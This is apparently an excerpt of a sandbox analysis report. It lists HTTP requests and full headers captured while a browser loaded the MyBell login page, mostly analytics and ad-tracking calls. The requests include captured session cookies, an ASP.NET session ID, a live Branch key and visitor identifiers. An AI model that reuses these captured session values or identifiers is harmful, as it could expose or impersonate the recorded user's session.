Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__6 HTTP/1.1Host: app.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__7 HTTP/1.1Host: app.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /b/ss/bellca/10/JS-2.22.0-LEWM/s07531857333589 HTTP/1.1Host: data1.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; __cwaf=true; at_check=true; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a31e547d2c2ffd38687ed59a36d0d4e2c0fc94de624e710b589015e25b0a3d820fda1dd28f1c1d871dd22fc12e6551b85cc0f44234e0afad0602c52a8cfebcfcf76961c87bb9de0e4034f922fa52610cf06c4bd0238fec9db15133395a516b29fc258302c7437258fc2b9533f20552b7afc5e2687b7696ede3c85851dd344ebbe563d42f62457d7f06efc569272c8603ab277efb2634e0358dfc98b74cf5c; AMCV_48B034FA53CF9FD10A490D44%40AdobeOrg=179643557%7CMCIDTS%7C20028%7CMCMID%7C26404690240998747124274156036452379072%7CMCAAMLH-1730985129%7C6%7CMCAAMB-1730985129%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730387529s%7CNONE%7CMCSYNCSOP%7C411-20035%7CvVersion%7C5.5.0; s_cc=true; gemini=region=ON|language=en|province=ON|LarSegmentType=undefined; _gcl_au=1.1.441004151.1730380345; BSCC=LoginSplashReturnURL=%2fLogin%3f_branch_match_id%3d1380522052703713689%26_branch_referrer%3dH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D; TLP025e8c23=028702b9c9692b4dde036b6f48311953767db06bb285a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c29da432a12f8fa973d6859ab4b9bf95d3d7ea5f56b8892bb8e17037a1f126e985c999dbd1d07c44d5ec8afaf2f6bb844bb17f3c07a5a7f83cd49351c2a911a5ca947d27a817d368faf54ae7e50a1842d2b57eac716f3ff3d0a55c9e8e128aa760d11afd37cabc7f1a9c13b24f5f873137471b379be7b6e2d795395816a5e8e1f2e418f6d39798439073d7d47d8e5abb89ebedced3714008024baabac0c69bb2b73489c2f92cfe3f6a21e9266ad18a9c7cb790e717910a9e948fabaca8f62d40d2453a6de990f7f33c7a1d85b4a989e357ccfff80ec2e3cb27aa1f5a73d036513baa2d2abdce10e77339c62a8affda7f305fa37c0ac2205be35ede10778493b158f1f1e1a6959a697f73147ac5311b7831b3fc19af85631ac85ef42f6348c117fb4da443ecd17f5697ed6f1588649dddab457ecda2b35cd23c481c16d539b2d72ed; _ga=GA1.1.1209393833.1730380347; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_
Source: global trafficHTTP traffic detected: GET /rb_bced360d-a02a-4b73-b0e7-46fe5ae1dc34?type=js3&sn=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0&svrid=8&flavor=post&vi=OSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0&modifiedSince=1730276476420&rf=https%3A%2F%2Fmybell.bell.ca%2FLogin%3F_branch_match_id%3D1380522052703713689%26_branch_referrer%3DH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D%23EXT%3Dbranch_supportrqcode&bp=3&app=429b1eac4514c5ce&crc=3890637999&en=gticcd0a&end=1 HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; __cwaf=true; ASP.NET_SessionId=xekfkxdqg0g3hnhhj5c40x2j; at_check=true; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a31e547d2c2ffd38687ed59a36d0d4e2c0fc94de624e710b589015e25b0a3d820fda1dd28f1c1d871dd22fc12e6551b85cc0f44234e0afad0602c52a8cfebcfcf76961c87bb9de0e4034f922fa52610cf06c4bd0238fec9db15133395a516b29fc258302c7437258fc2b9533f20552b7afc5e2687b7696ede3c85851dd344ebbe563d42f62457d7f06efc569272c8603ab277efb2634e0358dfc98b74cf5c; AMCV_48B034FA53CF9FD10A490D44%40AdobeOrg=179643557%7CMCIDTS%7C20028%7CMCMID%7C26404690240998747124274156036452379072%7CMCAAMLH-1730985129%7C6%7CMCAAMB-1730985129%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730387529s%7CNONE%7CMCSYNCSOP%7C411-20035%7CvVersion%7C5.5.0; s_cc=true; gemini=region=ON|language=en|province=ON|LarSegmentType=undefined; _gcl_au=1.1.441004151.1730380345; BSCC=LoginSplashReturnURL=%2fLogin%3f_branch_match_id%3d1380522052703713689%26_branch_referrer%3dH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D; TLP025e8c23=028702b9c9692b4dde036b6f48311953767db06bb285a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c29da432a12f8fa973d6859ab4b9bf95d3d7ea5f56b8892bb8e17037a1f126e985c999dbd1d07c44d5ec8afaf2f6bb844bb17f3c07a5a7f8
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__8 HTTP/1.1Host: app.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /rb_bced360d-a02a-4b73-b0e7-46fe5ae1dc34?type=js3&sn=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0&svrid=8&flavor=post&vi=OSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0&modifiedSince=1730276476420&rf=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&bp=3&app=429b1eac4514c5ce&crc=90906208&en=gticcd0a&end=1 HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; __cwaf=true; ASP.NET_SessionId=xekfkxdqg0g3hnhhj5c40x2j; at_check=true; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a31e547d2c2ffd38687ed59a36d0d4e2c0fc94de624e710b589015e25b0a3d820fda1dd28f1c1d871dd22fc12e6551b85cc0f44234e0afad0602c52a8cfebcfcf76961c87bb9de0e4034f922fa52610cf06c4bd0238fec9db15133395a516b29fc258302c7437258fc2b9533f20552b7afc5e2687b7696ede3c85851dd344ebbe563d42f62457d7f06efc569272c8603ab277efb2634e0358dfc98b74cf5c; AMCV_48B034FA53CF9FD10A490D44%40AdobeOrg=179643557%7CMCIDTS%7C20028%7CMCMID%7C26404690240998747124274156036452379072%7CMCAAMLH-1730985129%7C6%7CMCAAMB-1730985129%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730387529s%7CNONE%7CMCSYNCSOP%7C411-20035%7CvVersion%7C5.5.0; s_cc=true; gemini=region=ON|language=en|province=ON|LarSegmentType=undefined; _gcl_au=1.1.441004151.1730380345; BSCC=LoginSplashReturnURL=%2fLogin%3f_branch_match_id%3d1380522052703713689%26_branch_referrer%3dH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D; TLP025e8c23=028702b9c9692b4dde036b6f48311953767db06bb285a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c29da432a12f8fa973d6859ab4b9bf95d3d7ea5f56b8892bb8e17037a1f126e985c999dbd1d07c44d5ec8afaf2f6bb844bb17f3c07a5a7f83cd49351c2a911a5ca947d27a817d368faf54ae7e50a1842d2b57eac716f3ff3d0a55c9e8e128aa760d11afd37cabc7f1a9c13b24f5f873137471b379be7b6e2d795395816a5e8e1f2e418f6d39798439073d7d47d8e5abb89ebedced3
Source: global trafficHTTP traffic detected: GET /rb_bced360d-a02a-4b73-b0e7-46fe5ae1dc34?type=js3&sn=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0&svrid=8&flavor=post&vi=OSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0&modifiedSince=1730276476420&rf=https%3A%2F%2Fmybell.bell.ca%2FLogin%3F_branch_match_id%3D1380522052703713689%26_branch_referrer%3DH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D%23EXT%3Dbranch_supportrqcode&bp=3&app=429b1eac4514c5ce&crc=3959293252&en=gticcd0a&end=1 HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; __cwaf=true; ASP.NET_SessionId=xekfkxdqg0g3hnhhj5c40x2j; at_check=true; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a31e547d2c2ffd38687ed59a36d0d4e2c0fc94de624e710b589015e25b0a3d820fda1dd28f1c1d871dd22fc12e6551b85cc0f44234e0afad0602c52a8cfebcfcf76961c87bb9de0e4034f922fa52610cf06c4bd0238fec9db15133395a516b29fc258302c7437258fc2b9533f20552b7afc5e2687b7696ede3c85851dd344ebbe563d42f62457d7f06efc569272c8603ab277efb2634e0358dfc98b74cf5c; AMCV_48B034FA53CF9FD10A490D44%40AdobeOrg=179643557%7CMCIDTS%7C20028%7CMCMID%7C26404690240998747124274156036452379072%7CMCAAMLH-1730985129%7C6%7CMCAAMB-1730985129%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730387529s%7CNONE%7CMCSYNCSOP%7C411-20035%7CvVersion%7C5.5.0; s_cc=true; gemini=region=ON|language=en|province=ON|LarSegmentType=undefined; _gcl_au=1.1.441004151.1730380345; BSCC=LoginSplashReturnURL=%2fLogin%3f_branch_match_id%3d1380522052703713689%26_branch_referrer%3dH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D; TLP025e8c23=028702b9c9692b4dde036b6f48311953767db06bb285a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c29da432a12f8fa973d6859ab4b9bf95d3d7ea5f56b8892bb8e17037a1f126e985c999dbd1d07c44d5ec8afaf2f6bb844bb17f3c07a5a7f8
Source: global trafficHTTP traffic detected: GET /v1/pageview HTTP/1.1Host: api2.branch.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/web/events HTTP/1.1Host: analytics-fe.digital-cloud.medallia.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380341691&dc=21&dv=1&dl=1875 HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/953414520/?random=1730380359679&cv=11&fst=1730380359679&bg=ffffff&guid=ON&async=1&gtm=45be4as0h1v9172277568za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fmybell.bell.ca%2FLogin%3F_branch_match_id%3D1380522052703713689%26_branch_referrer%3DH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D&hn=www.googleadservices.com&frm=0&tiba=Log%20in%20to%20MyBell&npa=0&pscdl=noapi&auid=441004151.1730380345&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUluOG7rAMHEbdj-Ua_R3N0vCtoIba9CQhUZwM7uJdinHDgXKrZfaghEmRLXyZM
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=5&dv=1&dl=387&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/953414520/?random=1730380359679&cv=11&fst=1730379600000&bg=ffffff&guid=ON&async=1&gtm=45be4as0h1v9172277568za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fmybell.bell.ca%2FLogin%3F_branch_match_id%3D1380522052703713689%26_branch_referrer%3DH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D&hn=www.googleadservices.com&frm=0&tiba=Log%20in%20to%20MyBell&npa=0&pscdl=noapi&auid=441004151.1730380345&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dg5XKBiIT0zPFUVs_3EK36oaJjREA2He5cBZuo7c8DZ3UmC0r&random=1840511711&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/953414520/?random=1730380345423&cv=11&fst=1730379600000&bg=ffffff&guid=ON&async=1&gtm=45be4as0h1v9172277568za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&hn=www.googleadservices.com&frm=0&tiba=Log%20in%20to%20MyBell&npa=0&pscdl=noapi&auid=441004151.1730380345&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dKAK7Fzvn8r58wY3hWa5UUlhwjDUYX807ADDRAyE1QausB8LG&random=182547160&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=4&dv=1&dl=128&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=2&dv=1&dl=1137&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=multi&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=6&dv=1&dl=157&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /i/14028/da/?type=page&wid=693653&sid=84E654F18AD2AE89A616AA13A6B4CC6A8F&jspsf=1&pvid=1730380363135&dc=1&dv=1&dl=384&retryCode=socketNotConnected HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
